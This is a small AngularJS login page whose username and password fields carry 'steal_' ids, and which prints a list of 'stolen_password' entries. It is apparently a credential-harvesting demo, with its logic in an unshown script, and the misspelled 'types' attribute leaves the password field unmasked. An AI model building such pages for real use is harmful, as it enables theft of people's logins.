<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login</title>
</head>
<body ng-app="app" ng-controller="AppCtrl as app">
Enter username and password.

<div class="ui">
    <div>
        <input types="text" id="steal_username" placeholder="Username" ng-model="Username"/>
    </div>

    <div>
        <input types="text" id="steal_password" placeholder="Password" ng-model="Password"/>
    </div>

    <button ng-click="app.login()">Login</button>
</div>

<div ng-repeat="entry in app.entries">
    {{ entry.stolen_password }}
</div>

<script src="bower_components/angular/angular.js"></script>
<script src="js/app.js"></script>
</body>
</html>